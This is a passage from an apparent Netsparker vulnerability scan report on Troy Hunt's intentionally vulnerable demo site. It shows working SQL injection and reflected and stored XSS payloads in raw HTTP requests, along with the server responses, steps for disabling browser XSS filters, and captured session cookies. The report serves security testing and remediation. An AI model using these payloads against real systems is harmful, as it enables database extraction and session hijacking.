Notes: Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers, or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues; you need to manually confirm this problem. Generally, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with automatic MIME sniffing, such as Internet Explorer.
Certainty
Request:
GET /api/admin?nsextt=%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x0002E0)%3C/scRipt%3E HTTP/1.1
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Request:
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 209
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%27%2b+(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns)+%2b%27

Response:
…X-Powered-By: ASP.NET
Content-Length: 2867
Content-Type: application/json; charset=utf-8
Expires: -1

{"Message":"An error has occurred.","ExceptionMessage":"Conversion failed when converting the varchar value '_!@2dilemma' to data type int.","ExceptionType":"System.Data.SqlClient.SqlException","StackTrace":"   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrap…
2.2 /SupercarLeaderboard CONFIRMED
http://hackyourselffirst.troyhunt.com/SupercarLeaderboard?orderBy=(select+convert(int%2cCHAR(95)%2b
Parameters:
Parameter | Type | Value
orderBy | GET | (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
asc | GET | false
Extracted Data: microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
Request:
GET /SupercarLeaderboard?orderBy=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns)&asc=false HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://hackyourselffirst.troyhunt.com/SupercarLeaderboard
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
…X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 14292
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
2.3 /Make/2 CONFIRMED
http://hackyourselffirst.troyhunt.com/Make/2?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Parameters:
Parameter | Type | Value
orderby | GET | (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
Extracted Data: microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
Request:
GET /Make/2?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
…X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
2.4 /Make/3 CONFIRMED
http://hackyourselffirst.troyhunt.com/Make/3?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Parameters:
Parameter | Type | Value
orderby | GET | (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
Extracted Data: microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
Request:
GET /Make/3?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
…X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
2.5 /Make/1 CONFIRMED
http://hackyourselffirst.troyhunt.com/Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Parameters:
Parameter | Type | Value
orderby | GET | (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
Extracted Data: microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
Request:
GET /Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
…X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
IMPORTANT: 1 total, 1 confirmed
3. Cross-site Scripting
Netsparker detected cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.
Impact: There are many different attacks that can be leveraged through the use of cross-site scripting, including:
- Hijacking a user's active session
- Mounting phishing attacks
- Intercepting data and performing man-in-the-middle attacks
Remedy: The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context. For example, if the output goes into a JavaScript block within the HTML document, then the output needs to be encoded accordingly. Encoding can get very complex, therefore it is strongly recommended to use an encoding library such as OWASP ESAPI and Microsoft Anti-cross-site scripting.
Remedy References: Microsoft Anti-XSS Library; OWASP XSS Prevention Cheat Sheet; OWASP AntiSamy Java
External References: XSS Cheat Sheet; OWASP - cross-site scripting; XSS Shell; XSS Tunnelling
Proof of Concept Notes: The generated XSS exploit might not work due to browser XSS filtering. Please follow the guidelines below in order to disable XSS filtering for different browsers. Also note that XSS filtering is a feature that is enabled by default in some modern browsers. It should only be disabled temporarily to test exploits and should be reverted if the browser is actively used for anything other than testing purposes. Even though browsers have certain checks to prevent Cross-site scripting attacks, in practice there are a variety of ways to bypass this mechanism, therefore a web application should not rely on this kind of client-side browser check.
Chrome: Open a command prompt. Go to the folder where chrome.exe is located. Run the command: chrome.exe --args --disable-xss-auditor
Internet Explorer: Click Tools -> Internet Options and then navigate to the Security tab. Click Custom level and scroll towards the bottom, where you will find that Enable XSS filter is currently Enabled. Set it to Disabled. Click OK. Click Yes to accept the warning, followed by Apply.
Firefox: Go to about:config in the URL address bar. In the search field type urlbar.filter and find browser.urlbar.filter.javascript. Set its value to false by double clicking the row.
Classification: OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
3.1 /Search CONFIRMED
http://hackyourselffirst.troyhunt.com/Search?searchTerm='%2Bnetsparker(9)%2B'
Parameters:
Parameter | Type | Value
searchTerm | GET | '+netsparker(9)+'
Request:
GET /Search?searchTerm='%2Bnetsparker(9)%2B' HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response:
…</section></div></div></div></div></header>
<div class="container"><section>
<h2>You searched for &quot;<span id="searchTerm">'+netsparker(9)+'</span>&quot;</h2>
<p class="alert alert-error">No results found for your search</p>
</section><hr><footer><p>&copy; 2014 - Hack Yourself First</p></footer>
…></script>
<script>$('#results tr').click(function () { var url = '/Supercar/' + $(this).attr('id'); window.location.href = url; });
$('#searchTerm').val(''+netsparker(9)+'');</script>
<script>(function (i, s, o, g, r, a, m) { i['GoogleAnalyticsObject'] = r; i[r] = i[r] || function () { (i[r].q = i[r].q || []).push(arguments) }, i[r…
IMPORTANT: 1 total, 1 confirmed
4. Permanent Cross-site Scripting
Netsparker identified permanent cross-site scripting and confirmed this vulnerability by analyzing the execution of injected JavaScript.
Permanent XSS allows an attacker to execute dynamic scripts (JavaScript, VBScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by the user has been interpreted as HTML/JavaScript/VBScript within the browser.
Permanent means that the attack will be stored in the backend system. In normal XSS attacks an attacker needs to e-mail the victim, but in a permanent XSS an attacker can just execute the attack and wait for users to see the affected page. As soon as someone visits the page, the attacker's stored payload will get executed.
XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' sessions, the attacker might attack an administrator to gain full control over the application.
Impact: Permanent XSS is a dangerous issue that has many exploitation vectors, some of which include:
- Users' session-sensitive information, such as cookies, can be stolen
- XSS can enable client-side worms, which could modify, delete or steal other users' data within the application
- The website can be redirected to a new location, defaced or used as a phishing site
Remedy: The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML, ensure all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a whitelist. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured whitelist libraries available for many different environments; good examples of these include the OWASP Reform and Microsoft Anti cross-site scripting libraries.
Remedy References: [ASP.NET] - Microsoft Anti-XSS Library; OWASP XSS Prevention Cheat Sheet; OWASP AntiSamy Java
External References: XSS Cheat Sheet; OWASP - Cross-site Scripting; XSS Shell; XSS Tunnelling
Classification: OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
4.1 /Supercar/3 CONFIRMED
http://hackyourselffirst.troyhunt.com/Supercar/3
Injection URL: http://hackyourselffirst.troyhunt.com/api/vote
Injection Request:
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 77
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%22%3e%3cnet+sparker%3dnetsparker(0x00043F)%3e

Identification Request:
GET /Supercar/3 HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Injection Response:
HTTP/1.1 201 Created
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:53 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 0
Expires: -1

Identification Response:
…1)) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)),1,1)),0)=1</td></tr><tr><td>Troy Hunt</td><td>"><net sparker="netsparker(0x00043F)"></td></tr><tr><td>Troy Hunt</td><td>-1 OR 1=1) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)…
IMPORTANT: 1 total, 1 confirmed
5. Password Transmitted over HTTP
Netsparker detected that password data is being transmitted over HTTP.
Impact: If an attacker can intercept network traffic, he/she can steal users' credentials.
Actions to Take: 1. See the remedy for the solution. 2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.
Remedy: All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.
Classification: OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-319, CAPEC-65, WASC-04
5.1 /Account/Register CONFIRMED
http://hackyourselffirst.troyhunt.com/Account/Register
Form target action: http://hackyourselffirst.troyhunt.com/Account/Register
Request:
GET /Account/Register HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2265
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Register - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet">
